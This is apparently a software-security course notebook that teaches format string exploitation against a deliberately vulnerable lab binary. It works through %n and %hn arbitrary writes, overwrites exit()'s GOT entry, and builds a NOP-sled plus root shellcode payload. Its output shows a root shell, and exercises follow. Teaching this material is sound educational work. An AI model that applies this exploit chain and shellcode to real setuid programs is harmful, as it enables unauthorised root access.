! ./fmt_vuln.exe $(printf "AAAA")%4\$n
# get seg fault - because AAAA is not a valid address

The right way to print user-controlled input:
AAAA%4$n

The wrong way to print user-controlled input:


In [156]:
# no segfault if 4th argument was a valid memory address
# let's provide test_val's adddress
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")%4\$n

The right way to print user-controlled input:
�%4$n

The wrong way to print user-controlled input:
�

[*] test_val @ 0x0804c01c = 4 0x00000004
[*] text is @ 0xffffb940


In [157]:
# no need of JUNK; just use direct parameter access to write the rest in each memory byte
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%4\$n

The right way to print user-controlled input:
����%4$n

The wrong way to print user-controlled input:
����

[*] test_val @ 0x0804c01c = 16 0x00000010
[*] text is @ 0xffffb930


In [158]:
# let's write our controlled address: 0xbffffd72 to test_val
# let's do some math to get 0x72
print(0x72-16)

98


In [159]:
# use the result as width to get 0x72 as least significant value for our controlled address: 0xbffffd72
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%98x%4\$n

The right way to print user-controlled input:
����%98x%4$n

The wrong way to print user-controlled input:
����                                                                                          ffffb930

[*] test_val @ 0x0804c01c = 114 0x00000072
[*] text is @ 0xffffb930


In [160]:
# do some math to print 0xfd of our controlled address: 0xbffffd72
print(0xfd-0x72)

139


In [161]:
# use 139 as width to get 0xfd as next value
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%98x%4\$n%139x%5\$n

The right way to print user-controlled input:
����%98x%4$n%139x%5$n

The wrong way to print user-controlled input:
����                                                                                          ffffb920                                                                                                                                   ffffffff

[*] test_val @ 0x0804c01c = 64882 0x0000fd72
[*] text is @ 0xffffb920


In [162]:
# do some math to print 0xff of our controlled address: 0xbffffd72
print(0xff-0xfd)

2


In [163]:
# width of 2 doesn't work; shorter than (4 bytes or 8 characters hex) memory address!
# add 1 in the front to make 0xff a bigger number to get larger than 8 width
print(0x1ff-0xfd)

258


In [164]:
# use 2 as width to get 0xff as next value
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%98x%4\$n%139x%5\$n%258x%6\$n

The right way to print user-controlled input:
����%98x%4$n%139x%5$n%258x%6$n

The wrong way to print user-controlled input:
����                                                                                          ffffb910                                                                                                                                   ffffffff                                                                                                                                                                                                                                                           80491b0

[*] test_val @ 0x0804c01c = 33553778 0x01fffd72
[*] text is @ 0xffffb910


In [165]:
# do some math to print 0xbf of our controlled address: 0xbffffd72
print(0xbf-0xff)

-64


In [166]:
# negative width will not work!, make 0xbf larger by prepending 1
print(0x1bf-0xff)

192


In [167]:
# use 2 as width to get 0xff as next value
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

The right way to print user-controlled input:
����%98x%4$n%139x%5$n%258x%6$n%192x%7$n

The wrong way to print user-controlled input:
����                                                                                          ffffb910                                                                                                                                   ffffffff                                                                                                                                                                                                                                                           80491b0                                                                                                                                                                                         804c01c

[*] test_val @ 0x0804c01c = -1073742478 0xbffffd72
[*] text is @ 0xffffb910


## Using Short (2-byte) Writes
- a `short` is typically a two-byte word using `h`
- helps write an entire four-byte value with just two `%hn` parameters, instead of 4!
- let's overwrite test_val variable with the address `0xbffffd72`

| Address | Value |
| --- | --- |
| 0x0804c01c | 0xfd72 |
|0x0804c01e | 0xbfff |

In [168]:
# update least significant byte
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")%x%x%x%n

The right way to print user-controlled input:
�%x%x%x%n

The wrong way to print user-controlled input:
�ffffb930ffffffff80491b0

[*] test_val @ 0x0804c01c = 27 0x0000001b
[*] text is @ 0xffffb930


In [169]:
# notice the test_val in hex: updates on both ends of the 4 bytes
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")%x%x%x%hn

The right way to print user-controlled input:
�%x%x%x%hn

The wrong way to print user-controlled input:
�ffffb930ffffffff80491b0

[*] test_val @ 0x0804c01c = -65509 0xffff001b
[*] text is @ 0xffffb930


In [101]:
# short write can be used with direct parameter access
# update two least significant bytes
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")%4\$hn

The right way to print user-controlled input:
�%4$hn

The wrong way to print user-controlled input:
�

[*] test_val @ 0x0804c01c = -65532 0xffff0004
[*] text is @ 0xffffb940


In [170]:
# lets write 0xbffffd72 to test_val
#  ./fmt_vuln.exe $(printf "[first byte address][3rd byte address]")%[w]x%4\$hn%[w]x%5\$hn
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%x%4\$hn

The right way to print user-controlled input:
��%x%4$hn

The wrong way to print user-controlled input:
��ffffb930

[*] test_val @ 0x0804c01c = -65520 0xffff0010
[*] text is @ 0xffffb930


In [171]:
# 0xfd72 is written in first two (lower) bytes
# Since 8 bytes of memory addresses will be written, subtract it from the goal

print(0xfd72-8)

64874


In [172]:
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%64874x%4\$hn

The right way to print user-controlled input:
��%64874x%4$hn

The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

In [173]:
# 0xbfff is written in last two (higher bytes)
print(0xbfff-0xfd72)

-15731


In [174]:
# if smaller than previous width so, prepend 1
print(0x1bfff-0xfd72)

49805


In [175]:
# finally write 0xbffffd72 to test_val using 4th and 5th parameters
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%64874x%4\$hn%49805x%5\$hn

The right way to print user-controlled input:
��%64874x%4$hn%49805x%5$hn

The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

## Control the execution flow of the program
- overwrite the return address in the most recent stack frame
- stack-based overflow only allows overwriting return address
- however, format string vulnerability provides the ability to overwrite any memory address the program can access


## Overwriting the Global Offset Table
- See this [stackoverflow question to learn got and plt](https://stackoverflow.com/questions/43048932/why-does-the-plt-exist-in-addition-to-the-got-instead-of-just-using-the-got#:~:text=The%20PLT%20entry%20for%20a,first%20call%20(lazy%20binding).)
- PLT (procedure linkage table) is used to store shared library
- each time a shared function needs to be called, control will pass through the PLT
- objdump program can be used to see `.plt` section
- consists of many jump instructions each one corresponding to the address of a function
    - run the cell below to see .plt section in fmt_vuln.exe program
- `exit()` is called at the end of the program
- if `exit()` function can be manipulated to direct the execution flow into shellcode, a root shell will be spawned
- most of the functions are not jumping to addresses but to pointers to addresses
    - e.g., exit() function's address is stored at `0x0804c018` (see below)
- these addresses exist in another section, called the Global Offset Table (GOT) which is writable

In [176]:
! objdump -d -j .plt ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386


Disassembly of section .plt:

08049020 <__libc_start_main@plt-0x10>:
 8049020:	ff 35 f8 bf 04 08    	push   0x804bff8
 8049026:	ff 25 fc bf 04 08    	jmp    *0x804bffc
 804902c:	00 00                	add    %al,(%eax)
	...

08049030 <__libc_start_main@plt>:
 8049030:	ff 25 00 c0 04 08    	jmp    *0x804c000
 8049036:	68 00 00 00 00       	push   $0x0
 804903b:	e9 e0 ff ff ff       	jmp    8049020 <_init+0x20>

08049040 <printf@plt>:
 8049040:	ff 25 04 c0 04 08    	jmp    *0x804c004
 8049046:	68 08 00 00 00       	push   $0x8
 804904b:	e9 d0 ff ff ff       	jmp    8049020 <_init+0x20>

08049050 <strcpy@plt>:
 8049050:	ff 25 08 c0 04 08    	jmp    *0x804c008
 8049056:	68 10 00 00 00       	push   $0x10
 804905b:	e9 c0 ff ff ff       	jmp    8049020 <_init+0x20>

08049060 <puts@plt>:
 8049060:	ff 25 0c c0 04 08    	jmp    *0x804c00c
 8049066:	68 18 00 00 00       	push   $0x18
 804906b:	e9 b0 ff ff ff       	jmp    8049020 <_init+0x20>

0804907

In [177]:
# see .got section header and if it says DATA -- means WRRITABLE.
! objdump -h ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  08048194  08048194  00000194  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.gnu.build-id 00000024  080481a8  080481a8  000001a8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .note.ABI-tag 00000020  080481cc  080481cc  000001cc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .gnu.hash     00000020  080481ec  080481ec  000001ec  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynsym       00000080  0804820c  0804820c  0000020c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .dynstr       00000068  0804828c  0804828c  0000028c  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version  00000010  080482f4  080482f4  000002f4  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .gnu.version_r 00000030  08048304  08048

In [178]:
# display all dynamic relocations; short cut to see th pointers to the library functions
! objdump -R ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
0804bff0 R_386_GLOB_DAT    __gmon_start__@Base
0804c000 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.34
0804c004 R_386_JUMP_SLOT   printf@GLIBC_2.0
0804c008 R_386_JUMP_SLOT   strcpy@GLIBC_2.0
0804c00c R_386_JUMP_SLOT   puts@GLIBC_2.0
0804c010 R_386_JUMP_SLOT   exit@GLIBC_2.0




- NOTE: exit()'s GOT entry OFFSET - which can be overwritten with the address of smuggled shellcode

## Smuggle Shellcode & Exploit
- create shellcode using gdb-peda - see [GDB-Peda.ipynb](./GDB-Peda.ipynb) Notebook for details
    - use printf bash command to write 'shellcode as a binary file' > shellcode.bin
    - or use shellcode_writer.py script to create binary shellcode
- export shllcode as an env variable
- find and write the address of shellcode into the address of the exit() function
- when the program exits, it actually executes the shellcode in env variable

### steps
- stash the shellcode in env variable
- find the address of the shellcode when the vulnerable program is loaded
- find shared library function in GOT that's executed by the vulnerable program
- by exploiting format string vulnerability, write the shellcode's address to the shared function's jump address
- put it all together as a exploit code and launch it to exploit the vulnerable program

### Advantage of using GOT
- GOT entries are fixed per binary
    - different system with the same binary will have the same GOT entry at the same address
- ability to overwrite any arbitrary address opens up many possiblilites for exploitation
- any section of writable memory that contains an address that directs the flow of program execution can be targeted

In [179]:
! cp ../../../shellcode/shellcode_root.bin .

In [180]:
! ls -al

total 96
drwxr-xr-x 2 kali kali  4096 Sep 18 13:08 .
drwxr-xr-x 3 kali kali  4096 Sep 11 13:07 ..
-rwxr-xr-x 1 kali kali 14996 Sep 18 13:08 directpara.exe
-rw-r--r-- 1 kali kali   100 Sep 18 12:41 exploit_fmt.bin
-rw-r--r-- 1 kali kali   610 Sep 11 13:07 fmt_vuln.cpp
-rwsr-xr-x 1 root root 21412 Sep 13 13:21 fmt_vuln.exe
-rw-r--r-- 1 root root 10384 Sep 13 13:21 fmt_vuln.o
-rw-r--r-- 1 kali kali   500 Sep 15 13:03 getenvaddr.cpp
-rwxr-xr-x 1 kali kali 15028 Sep 15 13:03 getenvaddr.exe
-rw-r--r-- 1 kali kali   870 Sep 11 13:07 Makefile
-rw-r--r-- 1 kali kali    35 Sep 18 13:42 shellcode_root.bin


In [181]:
! pwd

/home/kali/Fa23/SoftwareSecurity/demos/fmt_strings/vuln1


### Use terminal to complete the following steps
- create SHELLCODE env variable

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ export SHELLCODE=$(cat ./shellcode_root.bin)

```
- get the address of SHELLCODE env variable when ./fmt_vuln.exe program is executing

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe   
SHELLCODE will be at 0xffffcc0b with reference to ./fmt_vuln.exe

```

- now that we know the address of shellcode, let's find out how we can write this address

### Create exploit code and test it to make sure you're writing the correct address

In [116]:
# try 1, 2, 3, 4, etc, until you see hex A's printed
# we not 4th parameter starts printing AAAA for fmt_vuln.exe
! ./fmt_vuln.exe $(printf "AAAA")%4\$x

The right way to print user-controlled input:
AAAA%4$x

The wrong way to print user-controlled input:
AAAA41414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb940


In [118]:
# let's write the SHELLCODE address 0xffffcc0b to test_val to make sure we can do it
# we can then use the calculations to write to exit function's location in GOT
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%4\$hn

The right way to print user-controlled input:
��%4$hn

The wrong way to print user-controlled input:
��

[*] test_val @ 0x0804c01c = -65528 0xffff0008
[*] text is @ 0xffffb930


In [119]:
# find the first width; # SHELLCODE will be at 0xffffcc0b
# 8 bytes of addresses will be printed
print(0xcc0b-8)

52227


In [120]:
# find the 2nd width; # SHELLCODE will be at 0xffffcc0b
print(0xffff-0xcc0b)

13300


In [124]:
# let's write SHELLCODE's address 0xffffcc0b to test_val for quick testing
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%52227x%4\$hn%13300x%5\$hn

The right way to print user-controlled input:
��%52227x%4$hn%13300x%5$hn

The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

In [122]:
# find the exit function's address in GOT and write SHELLCODE address to it
! objdump -R ./fmt_vuln.exe | grep exit

0804c010 R_386_JUMP_SLOT   exit@GLIBC_2.0


In [123]:
# find the location of 2nd two bytes of exit function
print(hex(0x10+2))

0x12


In [127]:
# Simply replace test_val's address with exit() address in the same order
! ./fmt_vuln.exe $(printf "\x10\xc0\x04\x08\x12\xc0\x04\x08")%52227x%4\$hn%13300x%5\$hn

The right way to print user-controlled input:
��%52227x%4$hn%13300x%5$hn

The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

### Finally, run the crafted command from a Terminal
- the vulnerable program should execute the stashed shellcode
- you should see a root prompt that you can interact with

```bash
...
...

[*] test_val @ 0x0804c028 = -72 0xffffffb8
[*] text is @ 0xffffbed0
# whoami
root
# cls
/bin//sh: 2: cls: not found
# clear
TERM environment variable not set.
# ls
Makefile  directpara.exe  fmt_vuln.cpp  fmt_vuln.exe  fmt_vuln.o  getenvaddr.cpp  getenvaddr.exe  shellcode_root.bin
# 
```

## Smuggle shellcode into the text buffer
- instead of stashing the Shellcode in environment variable, send it to the program and make the program execute it by overwriting the exit() function in GOT

### Steps
1. create a string in this format: `| NOP Sled | Shellcode |`
2. Find the address of text buffer
3. Find the address of `exit( )`
4. Overwrite the address of exit with the address of text buffer
    - exploit format string vulnerability to overwrite any address with your controlled address where the shellcode is stashed

In [182]:
! pwd

/home/kali/Fa23/SoftwareSecurity/demos/fmt_strings/vuln1


In [183]:
# find the size of exploit code
! wc -c ./shellcode_root.bin
# shellcode is 24 bytes

35 ./shellcode_root.bin


In [184]:
# create a string that's multiple of 4; not necessary
# let's create a string of 100 bytes long 25*4
# find length of NOP sleds to make 100 bytes long exploit code including shellcode
25*4-35

65

In [185]:
# text buffer is 1024 bytes big
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*65)' > exploit_fmt.bin

In [186]:
! wc -c ./exploit_fmt.bin

65 ./exploit_fmt.bin


In [187]:
! hexdump -C exploit_fmt.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000040  90                                                |.|
00000041


In [188]:
# let'S append Shellcode to the exploit code after the NOP sled
! cat shellcode_root.bin >> exploit_fmt.bin

In [189]:
! wc -c exploit_fmt.bin

100 exploit_fmt.bin


In [190]:
! hexdump -C exploit_fmt.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000040  90 31 c0 31 db 31 c9 99  b0 a4 cd 80 6a 0b 58 51  |.1.1.1......j.XQ|
00000050  68 2f 2f 73 68 68 2f 62  69 6e 89 e3 51 89 e2 53  |h//shh/bin..Q..S|
00000060  89 e1 cd 80                                       |....|
00000064


### Find the address of `text` buffer 
- typically found using gdb
- can't easily find the actual address of text buffer
- it shifts as we run the program with some arguments (size of the arguments matter), environment variables, program name, etc.
- see [Buffer Overflow Basics](./BufferOverflowBasics.ipynb) chapter for details
- we get different value outside the gdb
- there are workarounds but little tidious...
- for shake of learning and easiness, the address of text is printed!

In [191]:
! ./fmt_vuln.exe $(python -c 'print("A"*50)')
# notebook gives different address than the terminal; try it!

The right way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

The wrong way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb910


In [193]:
! ./fmt_vuln.exe $(python -c 'print("A"*200)')
# text is at different address as the argument is longer

The right way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

The wrong way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb880


### Do the following directly on a Terminal
- address of text buffer changes depending on where and how the program is run (with various length of argument) as shown above

- find the right parameter number that starts repeating the AAAA in hex (41414141)
     - try 1 2 ... n

- after trial and error 29th argument prints 41414141 (AAAA) again

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./fmt_vuln.exe $(cat exploit_fmt.bin)$(printf "AAAABBBB")%29\$x
The right way to print user-controlled input:
�����������������������������������������������������������������1�1�1ə��j
                                                                          XQh//shh/bin��Q��S��AAAABBBB%29$x

The wrong way to print user-controlled input:
�����������������������������������������������������������������1�1�1ə��j
                                                                          XQh//shh/bin��Q��S��AAAABBBB41414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb5c0

```

- let's use test_val's address to write controlled address for testing
- now notice the address of text (`0xffffffb8`)
    - NOTE - this may shift again as we build the final string
    
- subtract 100+8 from least two bytes
    - we need to print shellcode with nop sled of size 100 (see above)
    - we need to write 2 4-byte addresses (8 bytes) to access and write to that location using %hn

```

In [194]:
# let's calculate the address of text ...
! printf "%d" $((0xffb8-100-8))

65356

In [195]:
! printf "%d" $((0xffff-0xffb8))

71

- let's check if the address of buffer was calculated correctly by writing to test_val

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./fmt_vuln.exe $(cat exploit_fmt.bin)$(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%65356x%29\$hn%71x%30\$hn

....
[*] test_val @ 0x0804c01c = -72 0xffffffb8 <---- address we wanted to write
[*] text is @ 0xffffb5b0 <---- address has changed however....!!!!!
```

### Readjust the width ...
- the text buffer's address has changed...
- recreate the exploit code and launch with the new addresses


In [196]:
print(0xb5b0-100-8)

46404


In [197]:
0xffff-0xb5b0

19023

- let's run the exploit code with the new widths and write the address to test_val

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./fmt_vuln.exe $(cat exploit_fmt.bin)$(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%46404x%29\$hn%19023x%30\$hn

...

[*] test_val @ 0x0804c01c = -19024 0xffffb5b0 <---- address we wanted to write
[*] text is @ 0xffffb5b0 <--- address of text is still the same
```

In [198]:
# find the address of exit in GOT to write to
! objdump -R ./fmt_vuln.exe | grep exit

0804c010 R_386_JUMP_SLOT   exit@GLIBC_2.0


- modify the string to write to the address of exit function
- run the final exploit code on Terminal

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./fmt_vuln.exe $(cat exploit_fmt.bin)$(printf "\x10\xc0\x04\x08\x12\xc0\x04\x08")%46404x%29\$hn%19023x%30\$hn

...

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb5b0
# whoami                                                                                                       
root
# ls                                                                                                           
Makefile        exploit_fmt.bin  fmt_vuln.exe  getenvaddr.cpp  shellcode_root.bin
directpara.exe  fmt_vuln.cpp     fmt_vuln.o    getenvaddr.exe
#    
```

## Exercise 1
- stash your shellcode in shell environment and exploit the `format string` vulnerability in `labs/format_string/fmt_string.cpp` to execute the shellcode by modifying the return address to the address of shellcode in environment variable.

### steps:
- stash your shellcode in shell environment
- find the address of shellcode using getenvaddr program
- find the nth parameter that'll crash program

```bash
$ python -c 'print("AAAA%x%x%x%x%x%x%x")' | ./fmt_vuln2.exe 
$ python -c 'print("AAAA%x%x%x%x%x%x%7\$x")' | ./fmt_vuln2.exe
$ python -c 'print("<return address>%7\$n")' | ./fmt_vuln2.exe
$ python -c 'print("<8-byte return address>%widthx%7\$hn%widthx%8\$hn")' | ./fmt_vuln2.exe
```
- doing some math, update the return address using half-write with shellcode address

## Exercise 2
- Smuggle your `shellcode` as a part of data into the program and exploit the `format string` vulnerability in `labs/format_string/fmt_string.cpp` program found in this repo by modifying the return address to point to the exploit code.

### steps
- compile and make `labs/format_string/fmt_string.cpp` program a privileged program
- run the program to note the return address and the address of input buffer
- create an exploit file with 12 (nop sled) + 24 (shellcode) = 36 bytes it makes it easier if the total bytes is multiple of 4
```bash
$ python -c 'import sys; sys.stdout.buffer.write(b"\x90"*12)' > fmt_vuln2exploit.bin
$ cat shellcode.bin >> fmt_vuln2exploit.bin
$ wc -c fmt_vuln2exploit.bin
```
- find out the right parameter number that starts repeating AAAA in hex
```bash
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "AAAA")%1\$x
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "AAAA")%2\$x
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "AAAA")%15\$x
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "AAAA")%15\$x
```

- now find the width parameter to write the address of input buffer at the return address: let's say:
    - input is @ 0xffffc2e8
    - return address @ 0xffffc3bc
 
- find the width for the least 2 significant bytes

```bash
$ printf "%d" $((0xc2e8-36-8)) # 36 bytes is exploit code; that is printed as well. => 49852
$ printf "%d" $((0xffff-0xc2f8)) # -> 15639
```
- final exploit will look something like this...

```bash
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "\xbc\xc3\xff\xff\xbe\xc3\xff\xff")%49852x%15\$hn%15639x%16\$hn
```